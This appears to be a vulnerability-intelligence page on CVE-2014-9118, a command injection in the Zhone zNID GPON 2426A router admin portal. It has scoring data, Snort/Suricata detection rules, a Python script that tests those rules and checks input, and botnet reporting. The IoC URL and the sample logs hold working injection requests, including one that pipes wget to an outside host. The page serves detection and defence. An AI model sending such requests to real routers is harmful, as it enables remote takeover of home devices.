CVE-2014-9118
Published: 2017-10-17
Priority: P1 · 86 · high · CVSS 3.0 score 8.8
CVSS 3.0 vector: AV:N / AC:L / PR:L / UI:N / S:U / C:H / I:H / A:H
Tags: ITW (exploited in the wild) · EXPLOIT (public exploit available) · VulnCheck KEV
Exploited in the wild
EPSS: 53.36% (98.9th percentile)
The web administrative portal in Zhone zNID GPON 2426A before S3.0.501 allows remote attackers to execute arbitrary commands via shell metacharacters in the ipAddr parameter to zhnping.cmd.
Detection & IOCs (extracted from sources)
url: /zhnping.cmd?&test=traceroute&sessionKey=985703201&ipAddr=192.168.1.1|wget%20http://192.168.1.17/l00per_was_here&ttl=30&wait=3&queries=3
snort
ET EXPLOIT Zhone ZNID GPON 2426A any any (msg:"ET EXPLOIT Zhone ZNID GPON 2426A < S3.0.501 RCE (CVE-2014-9118) M1"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/zhnping.cmd?"; fast_pattern; content:"test=ping"; content:"sessionKey="; content:"ipAddr="; pcre:"/^[a-z0-9\.]+(?:[\x60\x3b\x7c\x26]|%60|%3b|%7c|%26|(?:[\x3c\x3e\x24]|%3c|%3e|%24)(?:\x28|%28))/Ri"; reference:url,www.exploit-db.com/exploits/38453; reference:url,cybersecurity.att.com/blogs/labs-research/rapidly-evolving-iot-malware-enemybot-now-targeting-content-management-system-servers; reference:cve,2014-9118; classtype:attempted-admin; sid:2036749; rev:2; metadata:attack_target Server, created_at 2022_06_02, cve CVE_2014_9118, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag Exploit, updated_at 2024_06_23, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
snort
ET EXPLOIT Zhone ZNID GPON 2426A any any (msg:"ET EXPLOIT Zhone ZNID GPON 2426A < S3.0.501 RCE (CVE-2014-9118) M2"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/zhnping.cmd?"; fast_pattern; content:"test=traceroute"; content:"sessionKey="; content:"ipAddr="; pcre:"/^[a-z0-9\.]+(?:[\x60\x3b\x7c\x26]|%60|%3b|%7c|%26|(?:[\x3c\x3e\x24]|%3c|%3e|%24)(?:\x28|%28))/Ri"; reference:url,www.exploit-db.com/exploits/38453; reference:url,cybersecurity.att.com/blogs/labs-research/rapidly-evolving-iot-malware-enemybot-now-targeting-content-management-system-servers; reference:cve,2014-9118; classtype:attempted-admin; sid:2036750; rev:2; metadata:attack_target Server, created_at 2022_06_02, cve CVE_2014_9118, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag Exploit, updated_at 2024_06_23, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
- The Snort PCRE pattern for detecting shell metacharacter injection in the `ipAddr` parameter is `/^[a-z0-9\.]+(?:[\x60\x3b\x7c\x26]|%60|%3b|%7c|%26|(?:[\x3c\x3e\x24]|%3c|%3e|%24)(?:\x28|%28))/Ri`; it is matched against the value that follows `ipAddr=` in the URI.
- The exploit has been observed in the wild as part of EnemyBot IoT malware campaigns targeting public-facing devices.
- The exploit PoC uses URL-encoded shell metacharacters such as `%7c` (pipe) to bypass naive input filters on the `ipAddr` parameter.
- The exploit requires a valid `sessionKey` in the request. Low-privileged authenticated users (not just admins) can trigger the RCE, because the web portal only enforces access control client-side via JavaScript.
- The vulnerability affects Zhone zNID GPON 2426A firmware versions before S3.0.501; detection rules should be scoped to devices running versions prior to this.
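The two ET rules above can be exercised offline before they go on a sensor. The following Python is an added example, not code from the page, from Emerging Threats or from the device vendor: it re-implements the rules' content and pcre checks (the Snort `R` modifier is emulated by matching on the text after `ipAddr=`), runs them over a handful of constructed access-log lines, and adds `is_safe_ipaddr`, a hypothetical allowlist validator of the kind a fixed request handler should apply. The Apache common log format and the RFC 5737 client addresses are assumptions; the second-stage URL in the sample is a placeholder, not a real IoC.

```python
import ipaddress
import re
from urllib.parse import unquote

# PCRE body from ET sids 2036749 / 2036750 (the Snort/Suricata rules above).
# Snort's "R" modifier anchors the pattern right after the preceding content
# match ("ipAddr="); we emulate that by matching only the text after it.
# "i" becomes re.IGNORECASE, which also makes the %xx escapes case-insensitive.
IPADDR_PCRE = re.compile(
    r"^[a-z0-9\.]+(?:[\x60\x3b\x7c\x26]|%60|%3b|%7c|%26"
    r"|(?:[\x3c\x3e\x24]|%3c|%3e|%24)(?:\x28|%28))",
    re.IGNORECASE,
)

# test= value each rule requires -> its sid (M1 = ping, M2 = traceroute)
RULE_SIDS = {"test=ping": 2036749, "test=traceroute": 2036750}


def match_zhnping_rule(method, uri):
    """Return the ET sid whose content/pcre checks the request satisfies, or None.

    Snort content matches are case-sensitive unless nocase is set, so the
    literal checks here are case-sensitive as well.
    """
    if method != "GET":
        return None
    if "/zhnping.cmd?" not in uri or "sessionKey=" not in uri:
        return None
    pos = uri.find("ipAddr=")
    if pos < 0:
        return None
    if not IPADDR_PCRE.match(uri[pos + len("ipAddr="):]):
        return None
    for needle, sid in RULE_SIDS.items():
        if needle in uri:
            return sid
    return None


# Apache/NCSA common log format (an assumption about the log source).
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "(\S+) (\S+) [^"]*" (\d{3})')


def scan_log(lines):
    """Return (client, sid, uri) for every log line that would trip a rule."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        client, method, uri, _status = m.groups()
        sid = match_zhnping_rule(method, uri)
        if sid is not None:
            hits.append((client, sid, uri))
    return hits


def is_safe_ipaddr(raw_value):
    """Hypothetical allowlist check a fixed handler should apply before the
    value reaches a shell: accept only an IP-address literal (assumption: the
    diagnostic page only needs IP targets, not hostnames)."""
    try:
        ipaddress.ip_address(unquote(raw_value))
    except ValueError:
        return False
    return True


# Constructed sample log lines shaped after the page's IoC URL; 203.0.113.x /
# 192.0.2.x are documentation addresses and "/x" is a placeholder path.
SAMPLE_LOG = [
    '203.0.113.5 - - [02/Jun/2022:10:00:01 +0000] "GET /zhnping.cmd?&test=traceroute&sessionKey=985703201&ipAddr=192.168.1.1|wget%20http://192.0.2.10/x&ttl=30 HTTP/1.1" 200 512',
    '203.0.113.6 - - [02/Jun/2022:10:00:02 +0000] "GET /zhnping.cmd?&test=ping&sessionKey=985703201&ipAddr=192.168.1.1%7Cid HTTP/1.1" 200 512',
    '203.0.113.7 - - [02/Jun/2022:10:00:03 +0000] "GET /zhnping.cmd?&test=ping&sessionKey=985703201&ipAddr=10.0.0.1%24%28id%29 HTTP/1.1" 200 512',
    '192.168.1.2 - - [02/Jun/2022:10:00:04 +0000] "GET /zhnping.cmd?&test=ping&sessionKey=985703201&ipAddr=8.8.8.8 HTTP/1.1" 200 512',
    '192.168.1.2 - - [02/Jun/2022:10:00:05 +0000] "GET /zhnping.cmd?&test=ping&sessionKey=985703201&ipAddr=8.8.8.8&ttl=30 HTTP/1.1" 200 512',
    '192.168.1.2 - - [02/Jun/2022:10:00:06 +0000] "GET /index.html HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    for client, sid, uri in scan_log(SAMPLE_LOG):
        print(f"sid {sid}  client {client}  uri {uri}")
```

Running it flags the raw pipe, the `%7c` pipe and the `%24%28` (`$(`) variants, and leaves the plain `ipAddr=8.8.8.8` request alone. It also flags the fifth line, a benign ping in which `ttl=30` follows `ipAddr=`: `\x26` (`&`) sits in the rule's first character class, so any request with a parameter after `ipAddr` satisfies the pcre. Treat a hit from these sids as a triage lead to be confirmed against the decoded parameter value and the device firmware version rather than as proof of compromise; on the device side, an allowlist check like `is_safe_ipaddr` rejects every injected variant while accepting real targets.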
CVSS provenance
nvd        v3.0  8.8  HIGH      CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
nvd        v2.0  9.0  CRITICAL  AV:N/AC:L/Au:S/C:C/I:C/A:C
vulncheck        8.8  HIGH
GHSA
GHSA-8fhg-9q98-67hg (ghsa_unreviewed · 2022-05-14): CVE-2014-9118 [HIGH] CWE-77
The web administrative portal in Zhone zNID GPON 2426A before S3.0.501 allows remote attackers to execute arbitrary commands via shell metacharacters in the ipAddr parameter to zhnping.cmd.
VulnCheck
vulncheck · 2014 · CVSS 8.8: CVE-2014-9118 [HIGH] dasanzhone znid_2426a_firmware, Improper Neutralization of Special Elements used in a Command ('Command Injection')
The web administrative portal in Zhone zNID GPON 2426A before S3.0.501 allows remote attackers to execute arbitrary commands via shell metacharacters in the ipAddr parameter to zhnping.cmd.
Affected: dasanzhone znid_2426a_firmware
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.fortinet.com/blog/threat-research/enemybot-a-look-into-keksecs-latest-ddos-botnet; https://blog.netlab.360.com/men-sheng-fa-da-cai-fodchajiang-shi-wang-luo/; https://cybersecurity.att.com/blogs/labs-research/rapidly-evolving-iot-malware-enemybot-now-targeti
Suricata
suricata · 2022-06-02 · CVSS 8.8: CVE-2014-9118 [HIGH] ET EXPLOIT Zhone ZNID GPON 2426A < S3.0.501 RCE (CVE-2014-9118) M1 (sid 2036749; full rule in the Detection & IOCs section)
Suricata
suricata · 2022-06-02 · CVSS 8.8: CVE-2014-9118 [HIGH] ET EXPLOIT Zhone ZNID GPON 2426A < S3.0.501 RCE (CVE-2014-9118) M2 (sid 2036750; full rule in the Detection & IOCs section)
Fortinet
blogs_fortinet · 2022-04-12: Enemybot: A Look into Keksec's Latest DDoS Botnet | FortiGuard Labs
By Joie Salvio and Roy Tay | April 12, 2022
In mid-March, FortiGuard Labs observed a new DDoS botnet calling itself “Enemybot” and attributing itself to Keksec, a threat group that specializes in cryptomining and DDoS attacks.
This botnet is mainly derived from Gafgyt’s source code but has been observed to borrow several modules from Mirai’s original source code.
It uses several methods of obfuscation for its strings to hinder analysis and hide itself from other botnets. Furthermore, it connects to a command-and-control (C2) server that is hidden in the Tor network, making its takedown more complicated.
Enemybot has been seen targeting routers from Seowon Intech, D-Link, and exploits a recently reported
Greynoiseio
blogs_greynoiseio: NoiseLetter January 2026
References
http://packetstormsecurity.com/files/133921/Zhone-Insecure-Reference-Password-Disclosure-Command-Injection.html
http://seclists.org/fulldisclosure/2015/Oct/57
http://www.securityfocus.com/archive/1/536663/100/0/threaded
https://www.exploit-db.com/exploits/38453/